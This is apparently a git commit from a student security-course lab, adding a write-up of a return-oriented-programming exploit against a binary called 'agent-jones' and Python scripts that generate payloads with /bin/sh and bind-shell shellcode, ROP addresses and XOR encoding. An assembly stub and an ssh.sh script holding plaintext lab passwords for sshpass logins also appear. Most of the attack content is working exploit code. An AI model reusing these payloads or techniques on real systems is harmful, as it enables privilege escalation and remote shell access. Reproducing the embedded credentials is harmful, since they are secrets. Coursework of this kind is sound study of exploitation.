finished proj1 p5

proj1/explain.md

@@ -221,5 +221,53 @@ with open('/dev/fd/1','wb') as f:
 
 ```
 
+## 4
+
+## 5
+
+- motivation
+
+I noticed the following content in `objdump -d agent-jones`:
+
+```
+ 8048680:	89 c8                	mov    %ecx,%eax
+ 8048682:	89 45 0c             	mov    %eax,0xc(%ebp)
+ 8048685:	8b 45 08             	mov    0x8(%ebp),%eax
+ 8048688:	23 45 0c             	and    0xc(%ebp),%eax
+ 804868b:	5d                   	pop    %ebp
+ 804868c:	c3                   	ret    
+
+...
+
+08048930 <__do_global_ctors_aux>:
+ 8048930:	55                   	push   %ebp
+ 8048931:	89 e5                	mov    %esp,%ebp
+ 8048933:	53                   	push   %ebx
+ 8048934:	52                   	push   %edx
+ 8048935:	bb dc 9e 04 08       	mov    $0x8049edc,%ebx
+ 804893a:	8b 03                	mov    (%ebx),%eax
+ 804893c:	83 f8 ff             	cmp    $0xffffffff,%eax
+ 804893f:	74 07                	je     8048948 <__do_global_ctors_aux+0x18>
+ 8048941:	ff d0                	call   *%eax
+ 8048943:	83 eb 04             	sub    $0x4,%ebx
+ 8048946:	eb f2                	jmp    804893a <__do_global_ctors_aux+0xa>
+ 8048948:	58                   	pop    %eax
+ 8048949:	5b                   	pop    %ebx
+ 804894a:	5d                   	pop    %ebp
+ 804894b:	c3                   	ret    
+
+```
+
+I can set `%ebp` to any fixed address, then return to 0x08048680. Because `&buf` is in `%ecx`, then value of `0xc(%ebp)` will be `&&buf`. Then put `%ebp+0xc` (that's a fixed address) onto stack, return to `0x08048949`, and now we have `&&buf` in `%ebx`. Then return to `0x0804893a`, `(%ebx)` is sent to `%eax` and jumps to `&buf`, we win!
+
+However, we need a fixed-address writable page to put `%ebp`. The page `0x08048000 - 0x08049000` is not writable. I'm so lucky that the page starts at `0x0804a000` works! So I set the "fixed address" to `0x0804a790`.
+
+- implementation
+
+Please see the image below. The procedure is too complicated to explain.
+
+
+
+
 
 

proj1/solution/egg5-bind

+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+######## run /bin/sh
+##shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+#shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" # the length is 40byte, run /bin/sh
+#shellcode_fill = "31" * (40 - int(len(shellcode)/2))
+#
+##payload = shellcode + shellcode_fill + revert('0804a790' + '08048928' + '0804892c' + '08048941')
+#payload = shellcode + shellcode_fill + revert('0804a790' + '08048680' + '0804a790' + '08048949' + '0804a79c' + '31313131' + '0804893a')
+#
+#import binascii
+#
+#b = binascii.unhexlify(payload)
+#b = bytes([byte^0x42 for byte in b[:32]]) + b[32:]
+#
+#with open('/dev/fd/1','wb') as f:
+#    f.write(b)
+#
+##########
+
+######### run bind
+
+shellcode = "e8000000005883c03fffe0" # jmp to new_shellcode
+nop = "90" * 5
+new_shellcode = "e8ffffffffc35d8d6d4a31c0996a015b52536a02ffd5965b5266682b67665389e16a105156ffd543435256ffd543525256ffd59359b03fcd804979f9b00b52682f2f7368682f62696e89e35253eb045f6a665889e1cd8057c3"
+
+shellcode_fill = "31" * (40 - int(len(shellcode)/2))
+
+#payload = shellcode + shellcode_fill + revert('0804a790' + '08048928' + '0804892c' + '08048941')
+payload = shellcode + shellcode_fill + revert('0804a790' + '08048680' + '0804a790' + '08048949' + '0804a79c' + '31313131' + '0804893a')
+payload = payload + nop + new_shellcode
+
+import binascii
+
+b = binascii.unhexlify(payload)
+b = bytes([byte^0x42 for byte in b[:32]]) + b[32:]
+
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+
+

proj1/solution/egg5-sh

+#!/usr/bin/python3
+# This egg launches /bin/sh as root.
+# It's not the final submitted script.
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" # the length is 40byte
+shellcode_fill = "31" * (40 - int(len(shellcode)/2))
+
+payload = shellcode + shellcode_fill + revert('0804a790' + '08048680' + '0804a790' + '0804892c' + '0804a79c' + '08048941')
+#payload = shellcode + shellcode_fill + revert('0804a790' + '08048928' + '0804892c' + '08048941')
+payload = shellcode + shellcode_fill + revert('0804a790' + '08048680' + '0804a790' + '08048949' + '0804a79c' + '31313131' + '0804893a')
+
+import binascii
+
+b = binascii.unhexlify(payload)
+b = bytes([byte^0x42 for byte in b[:32]]) + b[32:]
+
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+
+

proj1/solution/payload5-before-bind.s

+// get current addr
+call foo
+foo:
+pop %eax
+
+// 40 + 4+4+4+4+4+4+4 - 5
+add $63, %eax
+jmp *%eax
+
+_next_section:
+nop
+nop
+nop
+nop
+nop
+

proj1/ssh.sh

@@ -8,6 +8,7 @@ else
     #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
     #sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  smith@localhost -p 16161
     #sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  brown@localhost -p 16161
-    sshpass -p cqkeuevfIO ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  jz@localhost -p 16161
+    #sshpass -p cqkeuevfIO ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  jz@localhost -p 16161
+    sshpass -p Bw6eAWWXM8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  jones@localhost -p 16161
 
 fi